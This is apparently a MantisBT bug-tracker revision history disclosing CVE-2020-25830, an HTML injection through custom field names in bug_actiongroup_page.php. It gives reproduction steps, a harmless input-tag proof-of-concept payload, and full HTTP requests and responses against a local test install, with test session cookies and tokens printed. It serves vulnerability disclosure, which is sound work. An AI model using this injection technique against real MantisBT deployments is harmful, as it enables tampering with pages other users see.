View Revisions: Issue #27304

Summary 0027304: CVE-2020-25830: HTML Injection in bug_actiongroup_page.php
Revision 2020-09-23 12:13 by dregad
Steps To Reproduce
  • Login as admin
  • Go to manage_custom_field_page.php
  • Create a custom field with name <input type="text" value="Look I Injected this">
  • Link this new custom field to some project
  • Go to view_all_bug_page.php
  • Select one or more issues from the list
  • pick Update <input type="text" value="Look I Injected this"> from the selection list at page bottom
  • click OK to submit the form

bug_actiongroup_page.php opens, and and you see a rendered input field, with value of Look I Injected this (see attached screenshot poc.png)

Revision 2020-09-21 00:44 by d3vpoo1
Steps To Reproduce

Caution :

I already replace my Blind XSS payloads and I also double check it but please double check the response I don't want to cause harm, I search the word xss on the response and it seems no XSS payload rendered (instead the only payload that rendered is &lt;input type=&quot;text&quot; value=&quot;Look I Injected this&quot;>)

  • Login as your admin

  • Create custom field

  • Insert this payload &lt;input type=&quot;text&quot; value=&quot;Look I Injected this&quot;>

Request

POST /mantisbt2/manage_custom_field_create.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_custom_field_page.php
SOME-HEADERS

manage_custom_field_create_token=&lt;TOKEN>&name=%3Cinput+type%3D%22text%22+value%3D%22Look+I+Injected+this%22%3E

Response

HTTP/1.1 200 OK
Date: Mon, 21 Sep 2020 04:31:20 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 21 Sep 2020 04:31:20 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Mon, 21 Sep 2020 04:31:20 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10077
Connection: close
Content-Type: text/html; charset=UTF-8

&lt;!DOCTYPE html>
&lt;html>
&lt;head>
    &lt;meta http-equiv=&quot;Content-type&quot; content=&quot;text/html; charset=utf-8&quot; />
    &lt;title>MantisBT&lt;/title>
&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/default.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/dropzone-5.5.0.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/fonts.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-mantis.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-skins.min.css&quot; />

    &lt;link rel=&quot;shortcut icon&quot; href=&quot;/mantisbt2/images/favicon.ico&quot; type=&quot;image/x-icon&quot; />
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: full-text search&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=text&quot;/>
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: search by Issue Id&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=id&quot;/>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/jquery-2.2.4.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/dropzone-5.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/common.js&quot;>&lt;/script>
    &lt;meta http-equiv=&quot;Refresh&quot; content=&quot;1; URL=http://localhost/mantisbt2/manage_custom_field_edit_page.php?field_id=8&quot; />
&lt;/head>
&lt;body class=&quot;skin-3&quot;>
&lt;style>
* { font-family: &quot;Open Sans&quot;; } 
h1, h2, h3, h4, h5 { font-family: &quot;Open Sans&quot;; } 
&lt;/style>
&lt;div id=&quot;navbar&quot; class=&quot;navbar navbar-default navbar-collapse navbar-fixed-top noprint&quot;>&lt;div id=&quot;navbar-container&quot; class=&quot;navbar-container&quot;>&lt;button id=&quot;menu-toggler&quot; type=&quot;button&quot; class=&quot;navbar-toggle menu-toggler pull-left hidden-lg hidden-md&quot; data-target=&quot;#sidebar&quot;>&lt;span class=&quot;sr-only&quot;>Toggle sidebar&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;/button>&lt;div class=&quot;navbar-header&quot;>&lt;a href=&quot;/mantisbt2/my_view_page.php&quot; class=&quot;navbar-brand&quot;>&lt;span class=&quot;smaller-75&quot;> MantisBT &lt;/span>&lt;/a>&lt;button type=&quot;button&quot; class=&quot;navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg&quot; data-toggle=&quot;collapse&quot; data-target=&quot;.navbar-buttons,.navbar-menu&quot;>&lt;span class=&quot;sr-only&quot;>Toggle user menu&lt;/span>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;/button>&lt;/div>&lt;div class=&quot;navbar-buttons navbar-header navbar-collapse collapse&quot;>&lt;ul class=&quot;nav ace-nav&quot;>&lt;li class=&quot;hidden-sm hidden-xs&quot;>&lt;div class=&quot;btn-group btn-corner padding-right-8 padding-left-8&quot;>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;bug_report_page.php&quot;>&lt;i class=&quot;fa fa-edit&quot;></i> Report Issue&lt;/a>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;manage_user_create_page.php&quot;>&lt;i class=&quot;fa fa-user-plus&quot;></i> Invite Users&lt;/a>&lt;/div></li>&lt;li class=&quot;grey&quot; id=&quot;dropdown_projects_menu&quot;>
&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>
&0000160;1&0000160;
 &lt;i class=&quot;ace-icon fa fa-angle-down bigger-110&quot;></i>
&lt;/a>
&lt;ul id=&quot;projects-list&quot; class=&quot; dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;>
<li>&lt;div class=&quot;projects-searchbox&quot;>&lt;input class=&quot;search form-control input-md&quot; placeholder=&quot;Search&quot; />&lt;/div></li>&lt;li class=&quot;divider&quot;></li>
<li>&lt;div class=&quot;scrollable-menu&quot;>&lt;ul class=&quot;list dropdown-yellow no-margin&quot;><li>/mantisbt2/set_project.php?project_id=0</li>
&lt;li class=&quot;divider&quot;></li>
&lt;li class=&quot;active&quot;>/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=2;4</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
<li>/mantisbt2/set_project.php?project_id=3;1</li>
</ul>&lt;/div></li></ul>
</li>
&lt;li class=&quot;grey&quot;>&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;span class=&quot;user-info&quot;>administrator&lt;/span>&lt;i class=&quot;ace-icon fa fa-angle-down&quot;></i>&lt;/a>&lt;ul class=&quot;user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;><li>&lt;a href=&quot;/mantisbt2/account_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-user&quot;> </i> My Account&lt;/a></li><li>&lt;a href=&quot;http://localhost/mantisbt2/issues_rss.php?username=administrator&key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&project_id=2&quot;>&lt;i class=&quot;ace-icon fa fa-rss-square orange&quot;> </i> RSS&lt;/a></li>&lt;li class=&quot;divider&quot;></li><li>&lt;a href=&quot;/mantisbt2/logout_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-sign-out&quot;> </i> Logout&lt;/a></li></ul></li></ul>&lt;/div>&lt;/div>&lt;/div>&lt;div class=&quot;main-container&quot; id=&quot;main-container&quot;>
&lt;div id=&quot;sidebar&quot; class=&quot;sidebar sidebar-fixed responsive compact &quot;>&lt;ul class=&quot;nav nav-list&quot;><li>
&lt;a href=&quot;/mantisbt2/main_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-bullhorn&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Main &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/my_view_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-dashboard&quot;></i> 
&lt;span class=&quot;menu-text&quot;> My View &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/view_all_bug_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-list-alt&quot;></i> 
&lt;span class=&quot;menu-text&quot;> View Issues &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/bug_report_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-edit&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Report Issue &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/changelog_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-retweet&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Change Log &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/roadmap_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-road&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Roadmap &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/summary_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-bar-chart-o&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Summary &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
&lt;li class=&quot;active&quot;>
&lt;a href=&quot;/mantisbt2/manage_overview_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-gears&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Manage &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
</ul>&lt;div id=&quot;sidebar-btn&quot; class=&quot;sidebar-toggle sidebar-collapse&quot;>&lt;i data-icon2=&quot;ace-icon fa fa-angle-double-right&quot; data-icon1=&quot;ace-icon fa fa-angle-double-left&quot;
        class=&quot;ace-icon fa fa-angle-double-left&quot;></i>&lt;/div>&lt;/div>&lt;div class=&quot;main-content&quot;>
&lt;div id=&quot;breadcrumbs&quot; class=&quot;breadcrumbs noprint&quot;>
&lt;ul class=&quot;breadcrumb&quot;>
  <li>&lt;i class=&quot;fa fa-user home-icon active&quot;></i>  /mantisbt2/account_page.php
  &lt;span class=&quot;label hidden-xs label-default arrowed&quot;>administrator&lt;/span></li>
</ul>
&lt;div class=&quot;nav-recent hidden-xs&quot;>Recently Visited: /mantisbt2/view.php?id=22&lt;/div>&lt;div id=&quot;nav-search&quot; class=&quot;nav-search&quot;>&lt;form class=&quot;form-search&quot; method=&quot;post&quot; action=&quot;/mantisbt2/jump_to_bug.php&quot;>&lt;span class=&quot;input-icon&quot;>&lt;input type=&quot;text&quot; name=&quot;bug_id&quot; autocomplete=&quot;off&quot; class=&quot;nav-search-input&quot; placeholder=&quot;Issue #&quot;>&lt;i class=&quot;ace-icon fa fa-search nav-search-icon&quot;></i>&lt;/span>&lt;/form>&lt;/div>
&lt;/div>
  &lt;div class=&quot;page-content&quot;>
&lt;div class=&quot;row&quot;>
&lt;div class=&quot;container-fluid&quot;>&lt;div class=&quot;col-md-12 col-xs-12&quot;>&lt;div class=&quot;space-0&quot;>&lt;/div>&lt;div class=&quot;alert alert-success center&quot;>&lt;p class=&quot;bold bigger-110&quot;>Operation successful.</p><br />&lt;div class=&quot;btn-group&quot;>manage_custom_field_edit_page.php?field_id=8&lt;/div>&lt;/div>&lt;/div>&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;div class=&quot;clearfix&quot;>&lt;/div>
&lt;div class=&quot;space-20&quot;>&lt;/div>
&lt;div class=&quot;footer noprint&quot;>
&lt;div class=&quot;footer-inner&quot;>
&lt;div class=&quot;footer-content&quot;>
&lt;div class=&quot;col-md-6 col-xs-12 no-padding&quot;>
&lt;address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
&lt;small>Copyright &copy; 2000 - 2020 MantisBT Team&lt;/small><br>&lt;small>Contact thisisfortestingresearchonly@gmail.com for assistance&lt;/small><br>
&lt;/address>
&lt;/div>
&lt;div class=&quot;col-md-6 col-xs-12&quot;>
&lt;div class=&quot;pull-right&quot; id=&quot;powered-by-mantisbt-logo&quot;>
&lt;a href=&quot;https://www.mantisbt.org&quot; title=&quot;Mantis Bug Tracker: a free and open source web based bug tracking system.&quot;>&lt;img src=&quot;/mantisbt2/images/mantis_logo.png&quot; width=&quot;102&quot; height=&quot;35&quot; alt=&quot;Powered by Mantis Bug Tracker: a free and open source web based bug tracking system.&quot; />&lt;/a>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;a class=&quot;btn-scroll-up btn btn-sm btn-inverse display&quot; id=&quot;btn-scroll-up&quot; href=&quot;#&quot;>
&lt;i class=&quot;ace-icon fa fa-angle-double-up icon-only bigger-110&quot;></i>
&lt;/a>
&lt;/div>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-3.4.1.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/moment-with-locales-2.24.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/typeahead.jquery-1.3.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/list-1.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/ace.min.js&quot;>&lt;/script>
&lt;/body>
&lt;/html>
  • Link this new custom field to other issues

  • Login as developer account

  • Go to view_all_bug_page.php

  • Select anything and use the customize field

  • Submit the form

In my case this is the request and response

Request

POST /mantisbt2/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/view_all_bug_page.php
Cookie: MANTIS_collapse_settings=|resolved:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=q83o812mjs41pjfkfhr34g2613; MANTIS_secure_session=1; MANTIS_STRING_COOKIE=OncjK0J1oGgncmShWq0m-uP7sK905QTAmR1rxnh6JTuncssj_bRS2Tp2JTHyBUM5; MANTIS_BUG_LIST_COOKIE=23%2C22
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=22&action=custom_field_8

Response

HTTP/1.1 200 OK
Date: Mon, 21 Sep 2020 04:37:00 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 21 Sep 2020 04:37:01 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Mon, 21 Sep 2020 04:37:01 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10806
Connection: close
Content-Type: text/html; charset=UTF-8

&lt;!DOCTYPE html>
&lt;html>
&lt;head>
    &lt;meta http-equiv=&quot;Content-type&quot; content=&quot;text/html; charset=utf-8&quot; />
    &lt;title>MantisBT&lt;/title>
&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/default.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/status_config.php?cache_key=c9f03e237b2bbf0ff74e4de99e60aab9&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/dropzone-5.5.0.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/fonts.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-mantis.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-skins.min.css&quot; />

    &lt;link rel=&quot;shortcut icon&quot; href=&quot;/mantisbt2/images/favicon.ico&quot; type=&quot;image/x-icon&quot; />
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: full-text search&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=text&quot;/>
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: search by Issue Id&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=id&quot;/>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_config.php?cache_key=c9f03e237b2bbf0ff74e4de99e60aab9&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/jquery-2.2.4.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/dropzone-5.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/common.js&quot;>&lt;/script>
&lt;/head>
&lt;body class=&quot;skin-3&quot;>
&lt;style>
* { font-family: &quot;Open Sans&quot;; } 
h1, h2, h3, h4, h5 { font-family: &quot;Open Sans&quot;; } 
&lt;/style>
&lt;div id=&quot;navbar&quot; class=&quot;navbar navbar-default navbar-collapse navbar-fixed-top noprint&quot;>&lt;div id=&quot;navbar-container&quot; class=&quot;navbar-container&quot;>&lt;button id=&quot;menu-toggler&quot; type=&quot;button&quot; class=&quot;navbar-toggle menu-toggler pull-left hidden-lg hidden-md&quot; data-target=&quot;#sidebar&quot;>&lt;span class=&quot;sr-only&quot;>Toggle sidebar&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;/button>&lt;div class=&quot;navbar-header&quot;>&lt;a href=&quot;/mantisbt2/my_view_page.php&quot; class=&quot;navbar-brand&quot;>&lt;span class=&quot;smaller-75&quot;> MantisBT &lt;/span>&lt;/a>&lt;button type=&quot;button&quot; class=&quot;navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg&quot; data-toggle=&quot;collapse&quot; data-target=&quot;.navbar-buttons,.navbar-menu&quot;>&lt;span class=&quot;sr-only&quot;>Toggle user menu&lt;/span>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;/button>&lt;/div>&lt;div class=&quot;navbar-buttons navbar-header navbar-collapse collapse&quot;>&lt;ul class=&quot;nav ace-nav&quot;>&lt;li class=&quot;hidden-sm hidden-xs&quot;>&lt;div class=&quot;btn-group btn-corner padding-right-8 padding-left-8&quot;>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;bug_report_page.php&quot;>&lt;i class=&quot;fa fa-edit&quot;></i> Report Issue&lt;/a>&lt;/div></li>&lt;li class=&quot;grey&quot; id=&quot;dropdown_projects_menu&quot;>
&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>
&0000160;1&0000160;
 &lt;i class=&quot;ace-icon fa fa-angle-down bigger-110&quot;></i>
&lt;/a>
&lt;ul id=&quot;projects-list&quot; class=&quot; dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;>
<li>&lt;div class=&quot;projects-searchbox&quot;>&lt;input class=&quot;search form-control input-md&quot; placeholder=&quot;Search&quot; />&lt;/div></li>&lt;li class=&quot;divider&quot;></li>
<li>&lt;div class=&quot;scrollable-menu&quot;>&lt;ul class=&quot;list dropdown-yellow no-margin&quot;><li>/mantisbt2/set_project.php?project_id=0</li>
&lt;li class=&quot;divider&quot;></li>
&lt;li class=&quot;active&quot;>/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=2;4</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
<li>/mantisbt2/set_project.php?project_id=3;1</li>
</ul>&lt;/div></li></ul>
</li>
&lt;li class=&quot;grey&quot;>&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;span class=&quot;user-info&quot;>developer&lt;/span>&lt;i class=&quot;ace-icon fa fa-angle-down&quot;></i>&lt;/a>&lt;ul class=&quot;user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;><li>&lt;a href=&quot;/mantisbt2/account_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-user&quot;> </i> My Account&lt;/a></li><li>&lt;a href=&quot;http://localhost/mantisbt2/issues_rss.php?username=developer&key=D0UyVWhrNESQzO6Vfbhn4r-Nd9W69_PliszYzBiXVf874UK0ga5A9cZ0PavdL6cLjnmqSnV_ayBXeLVhmDCW&project_id=2&quot;>&lt;i class=&quot;ace-icon fa fa-rss-square orange&quot;> </i> RSS&lt;/a></li>&lt;li class=&quot;divider&quot;></li><li>&lt;a href=&quot;/mantisbt2/logout_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-sign-out&quot;> </i> Logout&lt;/a></li></ul></li></ul>&lt;/div>&lt;/div>&lt;/div>&lt;div class=&quot;main-container&quot; id=&quot;main-container&quot;>
&lt;div id=&quot;sidebar&quot; class=&quot;sidebar sidebar-fixed responsive compact &quot;>&lt;ul class=&quot;nav nav-list&quot;><li>
&lt;a href=&quot;/mantisbt2/main_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-bullhorn&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Main &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/my_view_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-dashboard&quot;></i> 
&lt;span class=&quot;menu-text&quot;> My View &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/view_all_bug_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-list-alt&quot;></i> 
&lt;span class=&quot;menu-text&quot;> View Issues &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/bug_report_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-edit&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Report Issue &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/changelog_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-retweet&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Change Log &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/roadmap_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-road&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Roadmap &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
</ul>&lt;div id=&quot;sidebar-btn&quot; class=&quot;sidebar-toggle sidebar-collapse&quot;>&lt;i data-icon2=&quot;ace-icon fa fa-angle-double-right&quot; data-icon1=&quot;ace-icon fa fa-angle-double-left&quot;
        class=&quot;ace-icon fa fa-angle-double-left&quot;></i>&lt;/div>&lt;/div>&lt;div class=&quot;main-content&quot;>
&lt;div id=&quot;breadcrumbs&quot; class=&quot;breadcrumbs noprint&quot;>
&lt;ul class=&quot;breadcrumb&quot;>
  <li>&lt;i class=&quot;fa fa-user home-icon active&quot;></i>  /mantisbt2/account_page.php
  &lt;span class=&quot;label hidden-xs label-default arrowed&quot;>developer&lt;/span></li>
</ul>
&lt;div class=&quot;nav-recent hidden-xs&quot;>Recently Visited: /mantisbt2/view.php?id=23&lt;/div>&lt;div id=&quot;nav-search&quot; class=&quot;nav-search&quot;>&lt;form class=&quot;form-search&quot; method=&quot;post&quot; action=&quot;/mantisbt2/jump_to_bug.php&quot;>&lt;span class=&quot;input-icon&quot;>&lt;input type=&quot;text&quot; name=&quot;bug_id&quot; autocomplete=&quot;off&quot; class=&quot;nav-search-input&quot; placeholder=&quot;Issue #&quot;>&lt;i class=&quot;ace-icon fa fa-search nav-search-icon&quot;></i>&lt;/span>&lt;/form>&lt;/div>
&lt;/div>
  &lt;div class=&quot;page-content&quot;>
&lt;div class=&quot;row&quot;>

&lt;div class=&quot;col-md-12 col-xs-12&quot;>
&lt;div id=&quot;action-group-div&quot; class=&quot;form-container&quot;>
    &lt;form method=&quot;post&quot; action=&quot;bug_actiongroup.php&quot;>
        &lt;input type=&quot;hidden&quot; name=&quot;bug_actiongroup_CUSTOM_token&quot; value=&quot;20200921U0hsx2e1DQ7yy2Y2QvtN2_JKmK_cSpZd&quot;/>        &lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;CUSTOM&quot; />
&lt;input type=&quot;hidden&quot; name=&quot;bug_arr[]&quot; value=&quot;22&quot; />
&lt;input type=&quot;hidden&quot; name=&quot;custom_field_id&quot; value=&quot;8&quot; />&lt;div class=&quot;widget-box widget-color-blue2&quot;>
&lt;div class=&quot;widget-header widget-header-small&quot;>
    &lt;h4 class=&quot;widget-title lighter&quot;>
        Update &lt;input type=&quot;text&quot; value=&quot;Look I Injected this&quot;>  &lt;/h4>
&lt;/div>
&lt;div class=&quot;widget-body&quot;>
    &lt;div class=&quot;widget-main no-padding&quot;>
        &lt;div class=&quot;table-responsive&quot;>
